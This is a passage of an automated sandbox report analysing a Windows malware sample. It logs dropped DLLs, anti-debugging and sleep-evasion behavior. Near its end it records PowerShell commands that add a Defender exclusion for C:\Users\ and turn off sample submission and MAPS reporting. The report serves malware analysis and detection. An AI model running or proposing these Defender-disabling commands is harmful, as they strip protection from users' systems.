Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: GetLastError,EnumServicesStatusExA,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapFree,strlen,strlen,GetProcessHeap,HeapAlloc,strcpy,21_2_00007FFE0EB434F4
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: GetLastError,EnumServicesStatusExA,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapFree,strlen,strlen,GetProcessHeap,HeapAlloc,strcpy,32_2_00007FFE11BD34F4
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: GetProcessHeap,HeapAlloc,GetAdaptersInfo,GetProcessHeap,HeapFree,GetProcessHeap,HeapAlloc,GetAdaptersInfo,21_2_00007FFE0E162BA8
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: GetProcessHeap,HeapAlloc,GetAdaptersInfo,GetProcessHeap,HeapFree,GetProcessHeap,HeapAlloc,GetAdaptersInfo,21_2_00007FFE0EB45728
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: GetProcessHeap,HeapAlloc,GetAdaptersInfo,GetProcessHeap,HeapFree,GetProcessHeap,HeapAlloc,GetAdaptersInfo,21_2_00007FFE11502BA8
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: GetProcessHeap,HeapAlloc,GetAdaptersInfo,GetProcessHeap,HeapFree,GetProcessHeap,HeapAlloc,GetAdaptersInfo,21_2_00007FFE11EC2CE8
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: GetProcessHeap,HeapAlloc,GetAdaptersInfo,GetProcessHeap,HeapFree,GetProcessHeap,HeapAlloc,GetAdaptersInfo,32_2_00007FFE11772BA8
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: GetProcessHeap,HeapAlloc,GetAdaptersInfo,GetProcessHeap,HeapFree,GetProcessHeap,HeapAlloc,GetAdaptersInfo,32_2_00007FFE11BD5728
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: GetProcessHeap,HeapAlloc,GetAdaptersInfo,GetProcessHeap,HeapFree,GetProcessHeap,HeapAlloc,GetAdaptersInfo,32_2_00007FFE11EC2BA8
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: GetProcessHeap,HeapAlloc,GetAdaptersInfo,GetProcessHeap,HeapFree,GetProcessHeap,HeapAlloc,GetAdaptersInfo,32_2_00007FFE126D2CE8
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: GetProcessHeap,HeapAlloc,GetAdaptersInfo,GetProcessHeap,HeapFree,GetProcessHeap,HeapAlloc,GetAdaptersInfo,32_2_00007FFE13202278
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: GetProcessHeap,HeapAlloc,GetAdaptersInfo,GetProcessHeap,HeapFree,GetProcessHeap,HeapAlloc,GetAdaptersInfo,32_2_00007FFE13301D98
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6231Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3507Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8187Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1433Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7756Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1656Jump to behavior
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeDropped PE file which has not been started: C:\Windows\Temp\DiEI7oU1Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeDropped PE file which has not been started: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\evtsrv.dllJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeDropped PE file which has not been started: C:\Windows\Temp\DkzUMxZ8Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeDropped PE file which has not been started: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\prgmgr.dllJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeDropped PE file which has not been started: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\rdpctl.dllJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeDropped PE file which has not been started: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\termsrv32.dllJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeDropped PE file which has not been started: C:\Windows\Temp\yGODxgsjJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeDropped PE file which has not been started: C:\Windows\Temp\LcUJSdZqJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeDropped PE file which has not been started: C:\Windows\Temp\YERHbDgwJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeDropped PE file which has not been started: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\rfxvmt.dllJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeDropped PE file which has not been started: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\samctl.dllJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeDropped PE file which has not been started: C:\Windows\Temp\5P46VR1VJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeDropped PE file which has not been started: C:\Windows\Temp\2s3EMNnhJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeDropped PE file which has not been started: C:\Windows\Temp\bT51Gn7QJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeDropped PE file which has not been started: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\cnccli.dllJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeDropped PE file which has not been started: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\dwlmgr.dllJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeDropped PE file which has not been started: C:\Windows\Temp\6KasAPG0Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_21-44015
Source: C:\Users\user\AppData\Local\Temp\w8m7wmyk939oczmkw4o2h16hs.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_5-9999
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeAPI coverage: 9.9 %
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeAPI coverage: 9.2 %
Source: C:\Users\user\Desktop\DF2.exe TID: 6724Thread sleep time: -23760000s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7124Thread sleep count: 6231 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7120Thread sleep count: 3507 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3940Thread sleep time: -8301034833169293s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4960Thread sleep count: 8187 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1136Thread sleep count: 1433 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6476Thread sleep time: -3689348814741908s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5480Thread sleep count: 7756 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5480Thread sleep count: 1656 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6892Thread sleep time: -4611686018427385s >= -30000sJump to behavior
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe TID: 6412Thread sleep count: 79 > 30
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe TID: 6412Thread sleep time: -39500s >= -30000s
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe TID: 1260Thread sleep count: 79 > 30
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe TID: 1260Thread sleep time: -39500s >= -30000s
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe TID: 7152Thread sleep count: 51 > 30
Source: C:\Users\user\Desktop\DF2.exeKey opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\08070809Jump to behavior
Source: C:\Users\user\Desktop\DF2.exeKey opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\04070809Jump to behavior
Source: C:\Users\user\Desktop\DF2.exeKey opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\08070809Jump to behavior
Source: C:\Users\user\Desktop\DF2.exeKey opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\04070809Jump to behavior
Source: C:\Users\user\Desktop\DF2.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeLast function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\w8m7wmyk939oczmkw4o2h16hs.exeCode function: 5_2_00007FF764CC3DB3 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,5_2_00007FF764CC3DB3
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 21_2_00007FF76A901CF3 FindNextFileA,_mbscpy,FindFirstFileA,GetLastError,GetLastError,FindClose,21_2_00007FF76A901CF3
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 21_2_00007FFE0E166233 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,21_2_00007FFE0E166233
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 21_2_00007FFE0EB4B333 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,21_2_00007FFE0EB4B333
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 21_2_00007FFE11504013 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,21_2_00007FFE11504013
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 21_2_00007FFE11EC5013 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,21_2_00007FFE11EC5013
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 32_2_00007FFE11776233 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,32_2_00007FFE11776233
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 32_2_00007FFE11BDB333 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,32_2_00007FFE11BDB333
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 32_2_00007FFE11EC4013 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,32_2_00007FFE11EC4013
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 32_2_00007FFE126D5013 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,32_2_00007FFE126D5013
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 32_2_00007FFE132057B3 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,32_2_00007FFE132057B3
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 32_2_00007FFE133031F3 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,32_2_00007FFE133031F3
Source: C:\Users\user\Desktop\DF2.exeThread delayed: delay time: 120000Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: nju2apmx83wqd9u7namsf59y.exe, 0000000A.00000002.1922920739.0000023EDEF58000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000015.00000003.1866710630.000001DE38CBC000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000020.00000002.2911699496.000002009FE88000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: DF2.exe, 00000001.00000002.2910782778.0000000000E01000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllEE
Source: main.exe, 00000015.00000002.2481928274.000001DE38C9C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll33
Source: C:\Users\user\Desktop\DF2.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeProcess queried: DebugPort
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeProcess queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\w8m7wmyk939oczmkw4o2h16hs.exeCode function: 5_2_00007FF764CCFF1F GetModuleHandleW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,5_2_00007FF764CCFF1F
Source: C:\Users\user\AppData\Local\Temp\w8m7wmyk939oczmkw4o2h16hs.exeCode function: 5_2_00007FF764CC45D5 fopen,_fsopen,fseek,_errno,_errno,_errno,_errno,_errno,_errno,_errno,_errno,ftell,_errno,_errno,_errno,_errno,fseek,fread,_errno,_errno,_errno,_errno,GetProcessHeap,HeapAlloc,_errno,_errno,_errno,_errno,GetProcessHeap,HeapFree,fclose,5_2_00007FF764CC45D5
Source: C:\Users\user\Desktop\DF2.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: DebugJump to behavior
Source: C:\Users\user\AppData\Local\Temp\w8m7wmyk939oczmkw4o2h16hs.exeCode function: 5_2_00007FF764CC1131 Sleep,Sleep,_amsg_exit,_initterm,_initterm,SetUnhandledExceptionFilter,malloc,strlen,malloc,_cexit,5_2_00007FF764CC1131
Source: C:\Users\user\AppData\Local\Temp\w8m7wmyk939oczmkw4o2h16hs.exeCode function: 5_2_00007FF764CD05D9 SetUnhandledExceptionFilter,5_2_00007FF764CD05D9
Source: C:\Users\user\AppData\Local\Temp\w8m7wmyk939oczmkw4o2h16hs.exeCode function: 5_2_00007FF764CDB6A0 SetUnhandledExceptionFilter,5_2_00007FF764CDB6A0
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 21_2_00007FF76A901131 Sleep,Sleep,_amsg_exit,_initterm,_initterm,SetUnhandledExceptionFilter,malloc,strlen,malloc,_cexit,21_2_00007FF76A901131

HIPS / PFW / Operating System Protection Evasion

barindex
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoLogo -Command "Add-MpPreference -ExclusionPath 'C:\Users\'"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoLogo -Command "Add-MpPreference -ExclusionPath 'C:\Users\'"Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoLogo -Command "Set-MpPreference -SubmitSamplesConsent NeverSend"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoLogo -Command "Set-MpPreference -MAPSReporting 0"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoLogo -Command "Set-MpPreference -SubmitSamplesConsent NeverSend"Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoLogo -Command "Set-MpPreference -MAPSReporting 0"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\w8m7wmyk939oczmkw4o2h16hs.exeCode function: 5_2_00007FF764CC292E strlen,strcat,strlen,strlen,strlen,strcat,strlen,strlen,strlen,strcat,LogonUserA,GetLastError,CreateProcessAsUserA,GetLastError,CloseHandle,CreateProcessA,GetLastError,5_2_00007FF764CC292E
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoLogo -Command "Set-MpPreference -SubmitSamplesConsent NeverSend"Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoLogo -Command "Set-MpPreference -MAPSReporting 0"Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoLogo -Command "Add-MpPreference -ExclusionPath 'C:\Users\'"Jump to behavior
Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 448 -p 7100 -ip 7100
Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7100 -s 1220
